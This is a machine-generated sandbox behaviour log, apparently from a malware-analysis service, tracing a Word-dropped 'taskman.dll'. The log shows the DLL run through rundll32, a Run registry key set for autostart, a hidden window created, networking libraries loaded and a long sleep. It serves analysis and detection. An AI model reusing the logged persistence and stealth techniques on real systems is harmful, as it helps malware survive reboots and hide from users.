Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: AutoRun object name not found 672491255
Memory allocated PID: 1096 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: unknown Protection: page read and write success or wait 672496356
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Personal Type: unicode Data: C:\Documents and Settings\Administrator\My Documents Old data: success or wait 680130177
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0d6ab97b-ade6-11de-bdcc-806d6172696f} Name: BaseClass Type: unicode Data: Drive Old data: success or wait 680238081
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{811e0202-1746-11df-8a4d-806d6172696f} Name: BaseClass Type: unicode Data: Drive Old data: success or wait 680248860
Key value replaced with same Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Common Documents Type: unicode Data: C:\Documents and Settings\All Users\Documents Old data: success or wait 680302938
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Desktop Type: unicode Data: C:\Documents and Settings\Administrator\Desktop Old data: success or wait 680329163
Key value replaced with same Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Common Desktop Type: unicode Data: C:\Documents and Settings\All Users\Desktop Old data: success or wait 680340195
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040110900063D11C8EF10054038389C\Usage Name: WORDFiles Type: dword Data: 1089994760 Old data: 1089994759 success or wait 680524516
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: A014E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 747577990
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: A014E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 747578519
Process created PID: 900 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Cmdline: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE /n /dde Createflags: none success or wait 747780139
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: A013E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 755257962
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: A013E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 755258343
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: 1, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 755360819
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: 1, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 755361144

General

Start time: 15:20:41
Start date: 24/07/2012
Path: C:\WINDOWS\system32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32.exe C:\Documents and Settings\Administrator\Application Data\taskman.dll start
Imagebase: 0x1000000
File size: 33280 bytes
MD5 hash: 037B1E7798960E0420003D05BB577EE6

File Activities

File Path Access Options Content overwritten Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\IMAGEHLP.dll write and read and execute unknown 76C90000 163840 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 1010000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 9B0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 9B0000 618496 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Application Data\taskman.dll read commit 9B0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 9B0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 9C0000 262144 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A00000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit A00000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A00000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit A00000 180224 own pid readonly success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown A00000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A10000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit BC0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit BC0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\WLDAP32.dll write and read and execute unknown 76F60000 180224 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_65536 write unknown BD0000 65536 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_32768 write unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_32768 query and write and read commit BE0000 32768 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 write unknown BF0000 32768 own pid read write success or wait 1
\KnownDlls\RASAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
\KnownDlls\rtutils.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rtutils.dll query and write and read and execute image 76E80000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit C80000 184320 own pid readonly success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\digest.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown C80000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit CC0000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
\KnownDlls\cryptdll.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
\KnownDlls\iphlpapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1
C:\WINDOWS\system32\mscoree.dll write and read and execute commit CC0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\mscoree.dll query and read commit CC0000 299008 own pid readonly success or wait 1
C:\WINDOWS\system32\mscoree.dll write and read and execute commit CC0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\mscoree.dll query and read commit CC0000 299008 own pid readonly success or wait 1
\BaseNamedObjects\Local\UrlZonesSM_Administrator query and write and read commit unknown unknown unknown unknown object name exists 1
\KnownDlls\hnetcfg.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit CE0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\taskman.dll write and read and execute commit 9B0000 61440 own pid execute success or wait 1 1001792
C:\Documents and Settings\Administrator\Application Data\taskman.dll query and write and read and execute image 10000000 61440 own pid read write success or wait 1 1001792
\KnownDlls\WS2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 1001792
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 1001792
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 1001792
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 1001792
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 10001A80
\KnownDlls\Normaliz.dll write and read and execute unknown A10000 36864 own pid read write conflicting addresses 1 10001A80
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 10001A80
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 10001A80

Registry Activities

Key Path Key Value Name Completion Count Source Address Symbol
Key Path Name Type Data Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe unicode rundll32.exe "C:\Documents and Settings\Administrator\Application Data\taskman.dll",start success or wait 1 10002781 RegSetValueExA
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
Key Path Name Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings User Agent success or wait 1 10001E58 RegQueryValueExA
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings User Agent success or wait 1 10001E58 RegQueryValueExA

Mutex Activities

Name Completion Count Source Address Symbol

Process Activities

PID Process info class Completion Count Source Address Symbol

Thread Activities

TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
1524 760 7C8106F9 100025BA C:\WINDOWS\system32\rundll32.exe success or wait 1 10002D6D CreateThread
TID PID Path Completion Count Source Address Symbol
TID Delay Completion Count Source Address Symbol
1524 -10800s unknown 1 1000271C Sleep
TID PID Completion Count Source Address Symbol

Memory Activities

PID Filepath Base Length Protection Completion Count Source Address Symbol
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:42 0 1 0
15:20:43 2 4 2
15:20:44 2 5 2
15:20:45 2 5 2
15:21:02 2 5 2
15:21:10 2 5 2
15:21:24 2 5 2

System Activities

System info class Completion Count Source Address Symbol

Timing Activities

Time Completion Count Source Address Symbol

Windows UI Activities

Window name Class name HWND Completion Count Source Address Symbol
RunDLL RunDLL B014E success 1 1001412 CreateWindowExW
c0d0so0 c0d0so0 60104 success 1 10002C64 CreateWindowExA
HWND Command Completion Count Source Address Symbol
60104 hide error 1 10002C79 NtUserShowWindow
HWND Message LParam WParam Completion Count Source Address Symbol
TID Message LParam WParam Completion Count Source Address Symbol
Module Thread id Hook code Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\taskman.dll Access: write and read and execute Type: commit Baseaddress: 9B0000 Size: 61440 Protection: execute Mapped to pid: own pid success or wait 749972233
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\taskman.dll Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 749976840
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 749985907
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 749989560
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 749999812
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 750001043
Window created Window Name: RunDLL Class Name: RunDLL HWND: B014E success 750034816
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 750338743
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: A10000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 750364848
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 750384422
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 750404878
Thread created PID: 760 TID: 1524 EIP: 7C8106F9 EAX: 100025BA Imagepath: C:\WINDOWS\system32\rundll32.exe success or wait 750604922
Window created Window Name: c0d0so0 Class Name: c0d0so0 HWND: 60104 success 750606022
Window shown HWND: 60104 CMD: hide error 750613264
Key value set Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Name: rundll32.exe Type: unicode Data: rundll32.exe "C:\Documents and Settings\Administrator\Application Data\taskman.dll",start Old data: success or wait 750619089
Key value queried Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings Name: User Agent success or wait 751108231
Key value queried Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings Name: User Agent success or wait 820401265
Thread delayed Time: -10800 TID: 1524 unknown 849042617
General
Start time: 15:20:41
Start date: 24/07/2012
Path: C:\WINDOWS\system32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp > nul
Imagebase: 0x4ad00000
File size: 389120 bytes
MD5 hash: 6D778E0F95447E6546553EEEA709D03C

File Activities

File Path Access Options Content overwritten Completion Count Source Address Symbol
nul read attributes and synchronize and generic write synchronous io non alert and non directory file true success or wait 1 4AD02F12 CreateFileW
File Path Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp success or wait 1 4AD17D07 DeleteFileW
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 340000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 490000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 970000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 970000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 440000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 440000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 440000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 970000 618496 own pid readonly success or wait 1

Registry Activities

Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor EnableExtensions success or wait 1 4AD04A4F RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DelayedExpansion object name not found 1 4AD04A88 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DefaultColor success or wait 1 4AD04AAD RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor PathCompletionChar success or wait 1 4AD04B37 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor AutoRun success or wait 1 4AD04BB8 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor EnableExtensions success or wait 1 4AD04A4F RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor DelayedExpansion object name not found 1 4AD04A88 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor DefaultColor success or wait 1 4AD04AAD RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor PathCompletionChar object name not found 1 4AD04B37 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor AutoRun object name not found 1 4AD04BB8 RegQueryValueExW

Mutex Activities

Name Completion Count Source Address Symbol

Process Activities

PID Process info class Completion Count Source Address Symbol
PID Filepath Completion Count Source Address Symbol

Memory Activities

PID Filepath Base Length Protection Completion Count Source Address Symbol
868 C:\WINDOWS\system32\cmd.exe 970000 13FE10 page read and write success or wait 1 4AD04578 VirtualAlloc
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:42 1 1 1
15:20:44 1 2 1

System Activities

System info class Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck object name not found 756896931
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions success or wait 756897263
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion object name not found 756897586
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor success or wait 756897953
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar success or wait 756898274
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar success or wait 756898593
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun success or wait 756898911
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DisableUNCCheck object name not found 756899483
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: EnableExtensions success or wait 756899808
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DelayedExpansion object name not found 756900130
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DefaultColor success or wait 756900449
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: CompletionChar success or wait 756900766
